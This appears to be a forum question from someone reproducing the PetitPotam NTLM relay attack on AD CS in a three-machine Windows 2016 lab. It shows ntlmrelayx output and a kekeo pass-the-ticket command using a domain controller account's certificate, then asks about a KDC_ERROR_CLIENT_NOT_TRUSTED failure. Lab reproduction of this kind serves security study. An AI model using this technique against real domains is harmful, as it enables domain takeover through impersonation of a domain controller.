active directory – Trying to reproduce petitpotam exploit, got “KDC_ERROR_CLIENT_NOT_TRUSTED (62)” error

I’m following this article to reproduce the EFS bug:

My environment:

  1. Windows 2016 AD (Hostname: W2016$)
  2. Windows 2016 SRV01 (Running AD CS service)
  3. Windows 2016 SRV02 (Attack machine)

I’ve successfully generated the certificate with ntlmrelayx

(*) Skipping user W2016$ since attack was already performed
(*) Base64 certificate of user W2016$:

Then I logged in to SRV02 with a low privilege user. When I pass the ticket in kekeo, it results in KDC_ERROR_CLIENT_NOT_TRUSTED error:

# tgt::ask /pfx:xxx /user:W2016$ / /ptt

Realm        : (corp)
User         : W2016$ (W2016$)
CName        : W2016$   (KRB_NT_PRINCIPAL (1))
SName        : krbtgt/    (KRB_NT_SRV_INST (2))
Need PAC     : Yes
Auth mode    : RSA
(kdc) name: (auto)
(kdc) addr: (auto)

Does anyone know what’s wrong here?